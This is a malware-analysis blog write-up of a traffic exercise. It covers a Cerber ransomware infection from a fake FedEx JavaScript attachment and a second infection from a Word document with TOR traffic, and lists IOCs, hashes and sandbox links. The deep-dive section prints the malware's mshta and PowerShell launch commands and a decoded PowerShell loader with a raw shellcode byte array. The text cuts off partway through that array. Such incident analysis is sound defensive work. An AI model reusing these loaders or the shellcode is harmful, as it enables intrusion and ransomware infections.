{"id":784,"date":"2017-05-05T21:52:32","date_gmt":"2017-05-05T20:52:32","guid":{"rendered":"http:\/\/www.herbiez.com\/?p=784"},"modified":"2017-05-05T21:59:21","modified_gmt":"2017-05-05T20:59:21","slug":"malware-exercise-2017-04-21-double-trouble","status":"publish","type":"post","link":"https:\/\/www.herbiez.com\/?p=784","title":{"rendered":"Malware Exercise 2017-04-21 Double Trouble"},"content":{"rendered":"

Below is my write up from Brad’s last malware exercise. You will be able to find the artifacts from these two investigations over on my Github page which can be found here<\/a>.<\/p>\n

Executive Summary
\n==================
\nThe brothers caused infections on their systems by opening malicious emails that were sent to them via their shared email address. Marion’s system received the Cerber ransomware infection and has encrypted different files on his system, while Marcus’ system has a generic malware infection which may have caused data exfil over a TOR network connection. <\/p>\n

About the Investigation
\n========================
\nOverall, the brothers system’s should be wiped and reloaded to make sure that any infection is properly removed before the systems are allowed back on the network. Any passwords also used on those system or for any network access should be changed immediately as well. The IOCs found below should be added to any perimeter firewalls to help protect other users and if at all possible, going back and looking at any previous firewall\/web gateway logs to see if there are hits for the IOCs found as well. Since these infections were not because of out-of-date software or anything like that, make sure that any host-based protections are updated (ie: AV, host-based IDS\/IPS signatures, etc…). Lastly user training would be good as that could help educate what to look for in a phishing email(s).<\/p>\n

Marion’s System:
\n—————-
\n– Date and time range of the traffic you\u2019re reviewing
\n> 2017.04.21 00:23:58 – 00:30:45
\n> Elapsed: 00:06:47<\/p>\n

\u2013 Date and time of infection
\n> Apr 21, 2017 00:25:54.241929000 BST<\/p>\n

\u2013 IP address, MAC address, Other host information
\n> 10.1.6.147 \/ 00:17:a4:b2:f6:91 \/ DUNHAM-K1B9N-PC<\/p>\n

Marcus’ System:
\n—————-
\n– Date and time range of the traffic you\u2019re reviewing
\n> 2017-04-21 00:15:59 – 2017-04-21 00:22:21
\n> Elapsed: 00:06:21<\/p>\n

\u2013 Date and time of infection
\n> Apr 21, 2017 00:21:32.025617000 BST<\/p>\n

\u2013 IP address, MAC address, Other host information
\n> 10.1.6.132 \/ 5c:26:0a:2a:4f:9b \/ DUNHAM-4759-WIN<\/p>\n

Indicators of Compromise
\n=========================<\/p>\n

Marion’s System
\n—————-
\ndev.alaw.net \/ 50.62.65.1 (HTTP)
\ntdricos.ru \/ 77.222.56.205 (HTTP)
\nmig-inform.ru \/ 77.222.40.89 (HTTP)
\nhombamovie.ru \/ 77.222.61.189 (HTTP)
\n94.21.172.0 – 94.21.172.31 (UDP 6893)
\n94.22.172.0 – 94.22.172.31 (UDP 6893)
\n94.23.172.0 – 94.23.172.255 (UDP 6893)
\n94.23.173.0 – 94.23.173.255 (UDP 6893)
\n94.23.174.0 – 94.23.174.255 (UDP 6893)
\n94.23.175.0 – 94.23.175.255 (UDP 6893)
\n58.211.200.86 (HTTP POST)
\napi.blockcypher.com \/ 54.44.51.92 (HTTP)
\nbtc.blockr.io \/ 104.16.148.172 (HTTP)
\np27dokhpz2n7nvgr.1m3xsy.top \/ 23.249.163.4 (HTTP)
\n221.69.192.112 \/ 123.196.217.66 \/ 12.11.7.176 \/ 192.16.30.34 \/ 206.30.109.5 \/ 209.134.110.79 \/ 78.153.116.246 \/ 217.87.202.172 \/ 124.143.3.53 \/ 13.141.26.200 \/ 48.84.133.98 \/ 26.213.133.191 \/ 27.67.144.19 \/ 191.88.65.80 \/ 99.175.62.218 \/ 182.145.119.244 \/ 37.97.243.100 \/ 202.75.36.126 \/ 9.110.182.146 \/ 112.60.150.205 \/ 209.24.224.172 \/ 9.186.103.243 \/ 68.124.253.251 \/ 175.79.7.182 \/ 129.83.122.71 \/ 67.98.76.16 \/ 37.82.135.251 \/ 72.27.241.13 \/ 214.95.105.107 \/ 90.14.169.128 \/ 61.236.34.197 \/ 58.140.102.69 \/ 197.43.144.157 \/ 44.216.60.106 \/ 167.50.53.114 \/ 182.229.79.125 \/ 108.10.8.72 \/ 203.21.62.127 \/ 63.214.127.25 \/ 23.213.206.93 (TCP 8080)<\/p>\n

Marcus’ System
\n—————-
\n185.165.29.36 (HTTP)
\n78.47.139.102 \/ myexternalip.com (HTTP)
\n23.23.117.228 \/ api.ipify.org (HTTPS)
\n93.115.97.242 \/ www.5jys6cfy2x7vi.com (TCP 9001 – TOR)
\n217.79.179.177 \/ www.tuqrjagtzwxe6swiq3d4imzr.com (TCP 9001 – TOR)<\/p>\n

Artifacts
\n==========<\/p>\n

Marion’s System
\n—————-
\nFile name: FedEx-Parcel-ID-S0JM7T30.zip
\nFile size: 1.0KB
\nMD5 Hash: 7a75f792b3a7ecadb5a64a76d7dc8163
\nVirustotal: http:\/\/virustotal.com\/en\/file\/aa671b1607be42f3b8a70bbf78eba4bc16a0c8e11a8ef59e650a7abc32bffce2\/analysis\/<\/a>
\nDetection ratio: 32 \/ 58
\nFirst detection: 2017-04-20 22:17:27 UTC
\nMalwr: NA
\nHybrid Analysis: http:\/\/www.hybrid-analysis.com\/sample\/6b57b39e8de230910af741d3fdec98727f93a9991b45d8da181d74d99dc92222?environmentId=100<\/a><\/p>\n

File name: FedEx-Parcel-ID-S0JM7T30
\nFile size: 1.1KB
\nMD5 Hash: 7759cc6fbc56cdcc23cf5df2d4d8dcdc
\nVirustotal: http:\/\/virustotal.com\/en\/file\/6b57b39e8de230910af741d3fdec98727f93a9991b45d8da181d74d99dc92222\/analysis\/<\/a>
\nDetection ratio: 32 \/ 56
\nFirst detection: 2017-04-20 22:17:46 UTC
\nMalwr: http:\/\/malwr.com\/analysis\/NmE2ZGJjYmVmNTQyNGUzNWE3MDFlMjUxOWM3ZDNkYjY\/<\/a>
\nHybrid Analysis: http:\/\/www.hybrid-analysis.com\/sample\/6b57b39e8de230910af741d3fdec98727f93a9991b45d8da181d74d99dc92222?environmentId=100<\/a><\/p>\n

File name: a1.exe
\nFile size: 317KB
\nMD5 Hash: 9389c9f01cbc7773c7b30be9d66dd78f
\nVirustotal: http:\/\/virustotal.com\/en\/file\/d779586ac6c196390fbad04a1b54e83c7a3a10a49a5977ced9ab6838d74e2bb1\/analysis\/<\/a>
\nDetection ratio: 43 \/ 61
\nFirst detection: 2017-04-20 22:29:57 UTC<\/p>\n

File name: a2.exe
\nFile size: 407KB
\nMD5 Hash: 844544ee349b6843403c97fb8b2f700f
\nVirustotal: http:\/\/virustotal.com\/en\/file\/dd0f988025f3a59c703cda5a1e2ee54c41b2f09fdde6dd0f426a385474260d24\/analysis\/<\/a>
\nDetection ratio: 41 \/ 63
\nFirst detection: 2017-04-20 22:29:55 UTC <\/p>\n

File name: c3046d01.e5782001b
\nFile size: 23KB
\nMD5 Hash: 826eae8a19da868ec54de81f0a828288<\/p>\n

File name: e7da1628.bat
\nFile size: 77B
\nMD5 Hash: dce0133247327e0b642338bdf7eb9575<\/p>\n

Marcus’ System
\n—————-
\nFile name: see shenandoah memorial hospital.doc
\nFile size: 98KB
\nMD5 Hash: 124fce358ca2aa9d9649d4c9fb45460d
\nVirustotal: http:\/\/virustotal.com\/en\/file\/997e71a509bba6d363b1e7a7f4f5ba30e83babee12b15269bec40eb110f2a254\/analysis\/<\/a>
\nDetection ratio: 32 \/ 55
\nFirst detection: 2017-04-20 22:34:45 UTC
\nMalwr: http:\/\/malwr.com\/analysis\/NjgzZDgwM2ZmNTY5NGI0ODg0Y2YzZjkzNTg4M2Q5NDA\/<\/a>
\nHybrid Analysis: http:\/\/www.hybrid-analysis.com\/sample\/997e71a509bba6d363b1e7a7f4f5ba30e83babee12b15269bec40eb110f2a254?environmentId=100<\/a><\/p>\n

File name: trolls.png
\nFile size: 5.0MB
\nMD5 Hash: 427c5905e8c888a027bb3d216b086859
\nVirustotal: http:\/\/virustotal.com\/en\/file\/9769c68884d4904f91dd2222d0889dd25e7357cb7ef4cfa730d0cf940422bbf3\/analysis\/<\/a>
\nDetection ratio: 48 \/ 62
\nFirst detection: 2017-04-20 22:01:42 UTC
\nMalwr: http:\/\/malwr.com\/analysis\/MWI3MWExZDMxNTZhNDJhYzgyMzg3Y2RjZjFhMGM5NDE\/<\/a>
\nHybrid Analysis: http:\/\/www.hybrid-analysis.com\/sample\/9769c68884d4904f91dd2222d0889dd25e7357cb7ef4cfa730d0cf940422bbf3?environmentId=100<\/a><\/p>\n

Deep Dive Analysis of The Compromises
\n=====================================<\/p>\n

Marion’s System:
\n—————-
\nThe email that caused the infection on Marion’s system was the email from the sender privileges@ns3.logomotion-serveur.com which is a fake FedEx package delivery email. The email has the attachment called FedEx-Parcel-ID-S0JM7T30.zip which has a Javascript file called FedEx-Parcel-ID-S0JM7T30.js when you extract it out.<\/p>\n

\"\"<\/a><\/p>\n

When running this javascript on my test system, the first thing that happened was that it triggered my copy of Word to open up and display the following gibberish.<\/p>\n

\"\"<\/a><\/p>\n

after that, I did notice the warning screen start to open on my test system letting me know that I had been infected with the Cerber ransomware as seen below:<\/p>\n

\"\"<\/a><\/p>\n

\"\"<\/a><\/p>\n

From the network perspective, when looking at the provided PCAP, I noticed the fact that the responses from the server state that the files are image files (filename=af74f.png and filename=17936611085a68.png) but are actual binary files.<\/p>\n

\"\"<\/a><\/p>\n

\"\"<\/a><\/p>\n

From here this looks to be a somewhat standard Cerber infection. We see traffic beaconing out once the malicious binaries take hold to various sites. We also see a classic sign of a Cerber infection – calls via UDP to a series of IP blocks on a certain port – in this case port 6893. We also see it reaching out to several IP addresses via 8080 as well. More on this in a bit.<\/p>\n

\"\"<\/a><\/p>\n

\"\"<\/a><\/p>\n

\"\"<\/a><\/p>\n

From a host perspective though, I am seeing something a little different than I have in the past. The initial javascript reaches out to the site hombamovie.ru and it downloads the malicious binaries and runs them as we can saw above. The interesting thing is that we can see that the javascript creates two files called “a1.exe” and “a2.exe” which perform some actions. The a1.exe process seems to adjust the Windows firewall since we see the following netsh commands:<\/p>\n

\r\nnetsh.exe advfirewall set allprofiles state on\r\nnetsh.exe advfirewall reset\r\n<\/pre>\n
and then opens notepad to display the message that the system has been infected via Cerber along with the webpage giving you the same information (classic Cerber). From what it looks like the a1.exe process is also the process that does the encryption of the files across the file system as well. We also then see a CMD process start which then proceeds to kill the a1.exe process via the command “taskkill  \/f \/im “a1.exe”” and also a single PING via the command “ping  -n 1 127.0.0.1.” I am unsure what exactly the a2.exe process does outside of creating, modifying, and deleting some registry keys related to giving this malware persistence. <\/p>\n
The other interesting bit is when the “svchost.exe” process starts working and creating new processes as seen below.<\/p>\n
\"\"<\/a><\/p>\n
When looking at the “mshta.exe” process, we can see that the command is following: <\/p>\n
\r\nC:\\windows\\system32\\mshta.exe javascript:yw7Rf="I";eb0=new%20ActiveXObject("WScript.Shell");ibmVG0SB="e";pLH5T=eb0.RegRead("HKCU\\\\software\\\\D2kswrM\\\\iNanAaW9a");OFYgs0Np="Dg";eval(pLH5T);OwHWO2="0DWL0SSr";<\/pre>\n
Looking at that location for that particular registry key I was not able to find anything. Instead I found the following instead.<\/p>\n
\"\"<\/a><\/p>\n
We also see that the “mshta.exe” process spins up Powershell with this command: <\/p>\n
\r\nC:\\windows\\SysWOW64\\WindowsPowerShell\\v1.0\\powershell.exe" iex $env:fezwh<\/pre>\n
\"\"<\/a><\/p>\n
which seems to point to this block of code (decoded from base64).<\/p>\n
\r\n#tgtfel\r\nsleep(15);try{\r\n#zstchcplcs\r\nfunction gdelegate{\r\n#ygqtzmnaz\r\nParam ([Parameter(Position=0,Mandatory=$True)] [Type[]] $Parameters,[Parameter(Position=1)] [Type] $ReturnType=[Void]);\r\n#qbumgd\r\n$TypeBuilder=[AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object System.Reflection.AssemblyName("ReflectedDelegate")),[System.Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule("InMemoryModule",$false).DefineType("XXX","Class,Public,Sealed,AnsiClass,AutoClass",[System.MulticastDelegate]);\r\n#jweuximes\r\n$TypeBuilder.DefineConstructor("RTSpecialName,HideBySig,Public",[System.Reflection.CallingConventions]::Standard,$Parameters).SetImplementationFlags("Runtime,Managed");\r\n#zmrldak\r\n$TypeBuilder.DefineMethod("Invoke","Public,HideBySig,NewSlot,Virtual",$ReturnType,$Parameters).SetImplementationFlags("Runtime,Managed");\r\n#iumxcl\r\nreturn $TypeBuilder.CreateType();}\r\n#samnr\r\nfunction gproc{\r\n#lcys\r\nParam ([Parameter(Position=0,Mandatory=$True)] [String] $Module,[Parameter(Position=1,Mandatory=$True)] [String] $Procedure);\r\n#awjcwptmpb\r\n$SystemAssembly=[AppDomain]::CurrentDomain.GetAssemblies()|Where-Object{$_.GlobalAssemblyCache -And $_.Location.Split("\\")[-1].Equals("System.dll")};\r\n#izycoy\r\n$UnsafeNativeMethods=$SystemAssembly.GetType("Microsoft.Win32.UnsafeNativeMethods");\r\n#cgdd\r\nreturn $UnsafeNativeMethods.GetMethod("GetProcAddress").Invoke($null,@([System.Runtime.InteropServices.HandleRef](New-Object System.Runtime.InteropServices.HandleRef((New-Object IntPtr),$UnsafeNativeMethods.GetMethod("GetModuleHandle").Invoke($null,@($Module)))),$Procedure));}\r\n#lfvvo\r\n[Byte[]] $sc32 = 0x55,0x8B,<#vr#>0xEC,0x81,0xC4,0x00,0xFA,0xFF,0xFF,0x53,0x56,0x57,0x53,0x56,0x57,0xFC,<#wkt#>0x31,0xD2,0x64,0x8B,0x52,0x30,0x8B,0x52,0x0C,0x8B,0x52,<#znw#>0x14,0x8B,0x72,0x28,0x6A,0x18,0x59,0x31,<#kz#>0xFF,0x31,0xC0,0xAC,0x3C,0x61,0x7C,0x02,0x2C,0x20,0xC1,0xCF,0x0D,0x01,0xC7,0xE2,0xF0,0x81,0xFF,0x5B,<#llh#>0xBC,0x4A,0x6A,0x8B,0x5A,0x10,0x8B,0x12,0x75,0xDB,0x89,0x5D,0xFC,0x5F,0x5E,0x5B,0x8B,0x45,0xFC,0x89,0x45,0xD4,0x8B,0x45,0xD4,0x66,0x81,0x38,0x4D,0x5A,0x0F,0x85,0x0F,0x02,0x00,0x00,0x8B,<#iy#>0x45,0xFC,0x33,0xD2,0x52,0x50,<#xwy#>0x8B,0x45,<#vk#>0xD4,0x8B,0x40,0x3C,0x99,0x03,0x04,0x24,0x13,0x54,0x24,0x04,0x83,0xC4,0x08,0x89,0x45,0xD0,0x8B,0x45,0xD0,0x81,0x38,0x50,0x45,0x00,0x00,0x0F,<#ji#>0x85,0xE5,0x01,0x00,0x00,0x8B,0x45,0xD0,0x8B,<#wtn#>0x40,0x78,0x03,0x45,0xFC,0x89,0x45,0xCC,0x8B,0x45,0xCC,0x8B,0x40,0x18,0x85,<#nqg#>0xC0,0x0F,0x8C,0xCB,0x01,0x00,0x00,0x40,0x89,0x85,0x3C,0xFF,0xFF,0xFF,0x33,0xF6,0x8B,<#bj#>0x45,0xFC,0x33,0xD2,0x52,0x50,0x8B,<#ov#>0x45,0xCC,0x8B,0x40,0x20,0x33,0xD2,0x52,<#vco#>0x50,0x8B,0xC6,0xC1,0xE0,0x02,0x99,0x03,0x04,0x24,0x13,0x54,0x24,0x04,0x83,<#pf#>0xC4,0x08,0x03,0x04,0x24,0x13,0x54,0x24,0x04,0x83,0xC4,0x08,0x8B,0x08,0x03,0x4D,0xFC,0x81,0x39,<#ac#>0x4C,0x6F,<#pee#>0x61,0x64,0x75,0x56,0x8D,<#yt#>0x41,0x04,<#vm#>0x81,0x38,0x4C,0x69,0x62,0x72,0x75,<#fil#>0x4B,0x8D,0x41,0x08,0x81,0x38,0x61,0x72,0x79,0x41,0x75,0x40,0x8D,0x41,0x0C,<#yvs#>0x80,0x38,0x00,0x75,0x38,0x8B,0x45,0xCC,0x8B,0x40,0x24,0x03,0x45,0xFC,0x33,0xD2,0x52,0x50,<#mdy#>0x8B,0xC6,0x03,0xC0,0x99,0x03,0x04,0x24,0x13,0x54,0x24,0x04,0x83,0xC4,0x08,0x66,0x8B,0x00,0x8B,0x55,0xCC,0x8B,0x52,<#tg#>0x1C,0x03,0x55,0xFC,0x0F,0xB7,0xC0,0xC1,0xE0,0x02,0x03,0xD0,0x8B,0x02,0x03,0x45,0xFC,0x89,0x45,0xBC,0x81,0x39,0x47,0x65,0x74,0x50,0x75,0x56,<#cdw#>0x8D,0x41,0x04,0x81,0x38,<#gx#>0x72,0x6F,0x63,0x41,0x75,0x4B,0x8D,0x41,0x08,0x81,0x38,0x64,0x64,0x72,0x65,0x75,0x40,0x8D,0x41,0x0E,0x80,<#pb#>0x38,0x00,0x75,0x38,0x8B,<#lzs#>0x45,0xCC,0x8B,0x40,0x24,0x03,0x45,0xFC,0x33,0xD2,0x52,<#ii#>0x50,0x8B,0xC6,<#eag#>0x03,0xC0,0x99,0x03,0x04,0x24,0x13,<#hck#>0x54,0x24,0x04,0x83,0xC4,0x08,0x66,0x8B,0x00,0x8B,0x55,0xCC,0x8B,0x52,0x1C,0x03,0x55,0xFC,0x0F,0xB7,0xC0,0xC1,0xE0,0x02,0x03,0xD0,0x8B,0x02,0x03,0x45,0xFC,<#jp#>0x89,0x45,0xB8,0x81,0x39,0x56,0x69,<#lv#>0x72,0x74,0x75,0x56,0x8D,0x41,0x04,<#dc#>0x81,0x38,0x75,0x61,0x6C,0x41,0x75,0x4B,0x8D,0x41,0x08,0x81,0x38,0x6C,0x6C,0x6F,0x63,0x75,0x40,0x8D,0x41,0x0C,0x80,0x38,0x00,0x75,0x38,0x8B,0x45,0xCC,0x8B,0x40,0x24,0x03,0x45,0xFC,0x33,0xD2,0x52,0x50,0x8B,0xC6,0x03,0xC0,0x99,0x03,0x04,0x24,0x13,0x54,0x24,<#te#>0x04,0x83,0xC4,0x08,0x66,0x8B,0x00,<#edg#>0x8B,0x55,0xCC,0x8B,0x52,0x1C,0x03,0x55,0xFC,0x0F,0xB7,0xC0,0xC1,0xE0,0x02,0x03,0xD0,0x8B,0x02,0x03,<#hm#>0x45,0xFC,0x89,0x45,0xA8,0x81,0x39,0x45,0x78,<#bts#>0x69,0x74,0x75,0x63,0x8D,<#jy#>0x41,0x04,0x81,0x38,0x50,0x72,0x6F,0x63,0x75,0x58,0x8D,<#vk#>0x41,0x08,0x80,0x38,0x65,0x75,<#bs#>0x50,0x8D,0x41,0x09,0x80,0x38,0x73,0x75,0x48,0x8D,0x41,0x0A,0x80,0x38,0x73,0x75,0x40,0x83,0xC1,0x0B,0x80,0x39,<#mc#>0x00,0x75,0x38,0x8B,0x45,0xCC,0x8B,<#kkx#>0x40,0x24,0x03,0x45,0xFC,0x33,0xD2,0x52,0x50,0x8B,0xC6,0x03,0xC0,0x99,0x03,0x04,0x24,0x13,0x54,0x24,0x04,0x83,0xC4,0x08,0x66,0x8B,0x00,0x8B,0x55,0xCC,0x8B,0x52,0x1C,<#sls#>0x03,<#pm#>0x55,0xFC,0x0F,0xB7,0xC0,0xC1,0xE0,0x02,<#vd#>0x03,0xD0,0x8B,0x02,0x03,0x45,0xFC,0x89,0x45,0xA4,0x46,0xFF,0x8D,0x3C,0xFF,0xFF,0xFF,0x0F,0x85,0x3E,<#fpc#>0xFE,<#ljm#>0xFF,0xFF,0xC6,0x85,0x2F,<#ut#>0xFF,0xFF,0xFF,0x61,0xC6,0x85,0x30,0xFF,0xFF,0xFF,0x64,<#byd#>0xC6,<#ge#>0x85,0x31,0xFF,0xFF,0xFF,0x76,0xC6,<#psa#>0x85,0x32,0xFF,0xFF,0xFF,0x61,0xC6,0x85,0x33,0xFF,0xFF,0xFF,0x70,0xC6,0x85,0x34,0xFF,0xFF,0xFF,0x69,<#hr#>0xC6,0x85,0x35,0xFF,<#gnx#>0xFF,0xFF,0x33,0xC6,0x85,0x36,0xFF,0xFF,0xFF,0x32,0xC6,0x85,0x37,0xFF,0xFF,0xFF,0x2E,0xC6,0x85,0x38,0xFF,0xFF,0xFF,0x64,0xC6,0x85,0x39,0xFF,<#gz#>0xFF,0xFF,0x6C,0xC6,0x85,0x3A,0xFF,0xFF,0xFF,0x6C,0xC6,0x85,0x3B,0xFF,0xFF,0xFF,0x00,0x8D,0x85,0x2F,0xFF,0xFF,0xFF,0x50,0xFF,0x55,0xBC,0x8B,0xD8,0x85,0xDB,0x75,0x05,0x6A,0x00,0xFF,0x55,0xA4,0x89,0x5D,0xD4,0x8B,0x45,0xD4,0x66,0x81,0x38,<#jbe#>0x4D,0x5A,<#bjh#>0x0F,0x85,0x4F,0x01,0x00,0x00,0x8B,0xC3,0x33,0xD2,0x52,0x50,0x8B,0x45,0xD4,0x8B,0x40,0x3C,0x99,0x03,0x04,<#pi#>0x24,0x13,0x54,0x24,0x04,0x83,0xC4,0x08,0x89,0x45,0xD0,0x8B,0x45,0xD0,0x81,0x38,0x50,0x45,0x00,0x00,0x0F,0x85,0x26,0x01,<#uq#>0x00,0x00,0x8B,0x45,0xD0,0x8B,0x40,0x78,0x03,0xC3,0x89,0x45,0xCC,0x8B,0x45,0xCC,0x8B,<#zk#>0x40,0x18,0x85,0xC0,0x0F,0x8C,0x0D,0x01,<#rab#>0x00,0x00,0x40,0x89,0x85,<#za#>0x3C,0xFF,0xFF,0xFF,0x33,<#wj#>0xF6,0x8B,0xC3,0x33,0xD2,0x52,0x50,0x8B,0x45,0xCC,0x8B,0x40,0x20,0x33,0xD2,0x52,0x50,<#fyl#>0x8B,0xC6,0xC1,0xE0,0x02,0x99,<#ouu#>0x03,0x04,0x24,0x13,<#ydp#>0x54,0x24,0x04,0x83,0xC4,<#ww#>0x08,0x03,0x04,0x24,0x13,0x54,0x24,0x04,0x83,0xC4,0x08,0x8B,<#pe#>0x08,0x03,0xCB,0x81,0x39,0x52,0x65,0x67,0x4F,0x75,0x5B,0x8D,0x41,0x04,0x81,0x38,0x70,0x65,0x6E,0x4B,0x75,0x50,0x8D,0x41,0x08,0x81,0x38,0x65,0x79,0x45,0x78,0x75,0x45,0x8D,0x41,<#eu#>0x0C,0x80,0x38,0x41,0x75,0x3D,0x8D,0x41,<#za#>0x0D,0x80,0x38,0x00,0x75,0x35,0x8B,0x45,0xCC,<#pem#>0x8B,0x40,0x24,0x03,0xC3,0x33,0xD2,0x52,0x50,0x8B,0xC6,0x03,0xC0,0x99,0x03,0x04,0x24,0x13,0x54,0x24,0x04,0x83,0xC4,0x08,0x66,0x8B,0x00,0x8B,0x55,0xCC,0x8B,0x52,0x1C,<#cu#>0x03,0xD3,0x0F,0xB7,0xC0,0xC1,0xE0,0x02,0x03,0xD0,0x8B,0x02,0x03,0xC3,0x89,0x45,0xB0,0x81,0x39,0x52,0x65,0x67,0x51,0x75,0x5E,0x8D,0x41,0x04,0x81,0x38,0x75,0x65,0x72,<#tee#>0x79,0x75,0x53,0x8D,0x41,0x08,0x81,0x38,0x56,0x61,0x6C,0x75,0x75,0x48,0x8D,0x41,0x0C,0x81,0x38,0x65,0x45,0x78,0x41,0x75,0x3D,0x83,0xC1,0x10,0x80,0x39,0x00,0x75,0x35,0x8B,0x45,0xCC,0x8B,0x40,0x24,0x03,0xC3,0x33,0xD2,<#ftc#>0x52,0x50,0x8B,<#ye#>0xC6,0x03,0xC0,0x99,0x03,0x04,0x24,0x13,0x54,0x24,0x04,0x83,0xC4,0x08,0x66,0x8B,0x00,0x8B,0x55,0xCC,0x8B,0x52,0x1C,0x03,0xD3,0x0F,0xB7,0xC0,0xC1,0xE0,0x02,0x03,0xD0,0x8B,0x02,0x03,0xC3,0x89,0x45,0xAC,0x46,<#xh#>0xFF,0x8D,0x3C,0xFF,0xFF,0xFF,0x0F,0x85,0xFC,0xFE,<#mc#>0xFF,0xFF,0x8B,0x45,0x08,0x05,<#cx#>0x48,0x0A,0x00,0x00,0x89,0x85,0x7C,0xFF,0xFF,0xFF,0x8B,0x85,0x7C,0xFF,0xFF,<#jme#>0xFF,0x05,0xE4,0x00,0x00,0x00,0x89,0x85,0x78,0xFF,<#ov#>0xFF,0xFF,0x33,0xDB,0x33,0xC0,0x89,0x85,0x64,0xFF,<#cll#>0xFF,0xFF,0x33,0xC0,0x89,0x85,0x60,0xFF,0xFF,0xFF,0x8D,0x85,0x70,0xFF,0xFF,<#tp#>0xFF,0x50,0x6A,0x01,0x6A,0x00,0x8B,0x85,0x7C,0xFF,0xFF,<#rrf#>0xFF,0x50,0x68,<#vhd#>0x02,0x00,0x00,0x80,0xFF,0x55,0xB0,0x85,0xC0,0x0F,0x85,0x86,0x00,<#lfe#>0x00,0x00,<#hn#>0x8D,0x85,<#onz#>0x60,0xFF,0xFF,0xFF,0x50,0x6A,0x00,0x8D,0x85,0x6C,0xFF,0xFF,<#fr#>0xFF,0x50,<#zkn#>0x6A,0x00,0x8B,<#uk#>0x85,0x7C,0xFF,0xFF,0xFF,0x83,0xC0,0x41,0x50,0x8B,0x85,0x70,0xFF,0xFF,0xFF,0x50,0xFF,0x55,0xAC,0x85,0xC0,0x75,0x5C,0x83,0xBD,<#de#>0x60,0xFF,0xFF,0xFF,0x64,<#wk#>0x76,0x53,0x6A,0x40,0x68,0x00,0x30,0x00,0x00,0x8B,0x85,0x60,0xFF,0xFF,0xFF,0x50,0x6A,0x00,0xFF,0x55,0xA8,0x89,0x85,<#nt#>0x64,0xFF,0xFF,0xFF,0x83,0xBD,0x64,0xFF,0xFF,0xFF,0x00,0x74,0x31,0x8D,0x85,0x60,<#ez#>0xFF,0xFF,0xFF,0x50,0x8B,0x85,0x64,0xFF,0xFF,0xFF,0x50,0x8D,0x85,0x6C,0xFF,<#eo#>0xFF,0xFF,0x50,0x6A,0x00,<#uw#>0x8B,0x85,0x7C,0xFF,0xFF,<#od#>0xFF,0x83,<#gea#>0xC0,0x41,0x50,0x8B,<#vk#>0x85,0x70,0xFF,0xFF,0xFF,<#sx#>0x50,0xFF,0x55,0xAC,0x85,0xC0,0x75,0x02,<#rmz#>0xB3,0x01,0x33,0xC0,0x89,0x85,0x70,0xFF,0xFF,0xFF,0x84,0xDB,0x0F,0x85,0xB8,0x00,<#ufc#>0x00,0x00,0x33,0xC0,0x89,<#uv#>0x85,0x64,0xFF,0xFF,0xFF,0x33,0xC0,0x89,0x85,0x60,0xFF,0xFF,0xFF,<#so#>0x8D,0x85,0x70,0xFF,0xFF,0xFF,0x50,0x6A,0x01,0x6A,0x00,0x8B,0x85,0x7C,0xFF,0xFF,<#oi#>0xFF,0x50,0x68,0x01,0x00,0x00,0x80,0xFF,0x55,0xB0,0x85,0xC0,0x0F,0x85,0x86,0x00,0x00,0x00,0x8D,0x85,0x60,0xFF,0xFF,0xFF,0x50,0x6A,0x00,0x8D,0x85,0x6C,0xFF,0xFF,0xFF,0x50,0x6A,<#sty#>0x00,0x8B,0x85,0x7C,0xFF,0xFF,0xFF,<#rkf#>0x83,0xC0,0x41,0x50,0x8B,0x85,0x70,0xFF,<#mx#>0xFF,0xFF,<#sq#>0x50,0xFF,0x55,0xAC,0x85,0xC0,0x75,0x5C,0x83,0xBD,0x60,0xFF,0xFF,0xFF,0x64,0x76,0x53,0x6A,0x40,0x68,0x00,0x30,0x00,0x00,0x8B,0x85,0x60,0xFF,0xFF,0xFF,0x50,0x6A,0x00,0xFF,0x55,0xA8,0x89,0x85,0x64,0xFF,0xFF,0xFF,0x83,0xBD,0x64,0xFF,0xFF,0xFF,0x00,0x74,0x31,0x8D,0x85,0x60,0xFF,0xFF,0xFF,0x50,0x8B,0x85,0x64,0xFF,0xFF,0xFF,0x50,0x8D,0x85,0x6C,0xFF,0xFF,0xFF,0x50,0x6A,0x00,0x8B,0x85,0x7C,0xFF,0xFF,0xFF,0x83,0xC0,0x41,0x50,0x8B,<#yij#>0x85,0x70,0xFF,0xFF,0xFF,0x50,0xFF,0x55,0xAC,0x85,0xC0,0x75,0x02,0xB3,0x01,0x84,0xDB,0x75,0x05,0x6A,0x00,0xFF,0x55,0xA4,<#lmi#>0x8B,0x85,0x7C,0xFF,0xFF,0xFF,0x8B,<#aqr#>0x80,<#nj#>0xDC,0x00,0x00,0x00,0x50,0x8B,0x85,0x7C,0xFF,0xFF,0xFF,0x83,0xC0,0x52,0x50,0x8D,0x85,0x00,0xFA,<#nzi#>0xFF,0xFF,0x50,0xFF,<#ens#>0x95,<#st#>0x78,0xFF,0xFF,0xFF,0x33,0xF6,0x8D,0x8D,0x00,0xFB,0xFF,0xFF,0x89,0x31,<#zt#>0x46,0x83,0xC1,0x04,0x81,0xFE,0x00,0x01,0x00,0x00,0x75,0xF2,0x33,0xDB,<#kao#>0x33,0xF6,0x8D,<#qez#>0x8D,0x00,<#hz#>0xFB,0xFF,<#oel#>0xFF,0x03,0x19,0x8B,0x85,0x7C,0xFF,0xFF,0xFF,0xFF,0xB0,0xDC,0x00,0x00,0x00,0x8B,0xC6,0x5A,0x8B,0xFA,0x33,0xD2,0xF7,0xF7,0x33,0xC0,0x8A,0x84,0x15,0x00,0xFA,0xFF,0xFF,<#sg#>0x03,0xD8,0x81,0xE3,0xFF,0x00,<#bul#>0x00,0x00,0x8A,0x01,0x8B,0x94,0x9D,0x00,0xFB,<#bh#>0xFF,0xFF,0x89,0x11,0x25,0xFF,0x00,0x00,0x00,0x89,0x84,0x9D,0x00,0xFB,0xFF,0xFF,0x46,0x83,0xC1,0x04,0x81,0xFE,0x00,0x01,0x00,0x00,0x75,0xB5,0x33,0xDB,0x33,0xFF,0x6A,0x40,0x68,0x00,0x30,0x00,0x00,0x8B,0x85,0x60,0xFF,0xFF,<#gr#>0xFF,0x50,0x6A,0x00,0xFF,0x55,0xA8,<#ih#>0x89,0x85,0x5C,0xFF,0xFF,0xFF,0x83,<#dgz#>0xBD,0x5C,0xFF,0xFF,0xFF,0x00,0x74,0x29,0x8B,0x85,0x5C,0xFF,0xFF,0xFF,0x89,0x85,0x4C,0xFF,0xFF,0xFF,0x8B,0x85,0x60,0xFF,0xFF,0xFF,<#cp#>0x50,0x8B,0x85,0x64,0xFF,0xFF,0xFF,0x50,0x8B,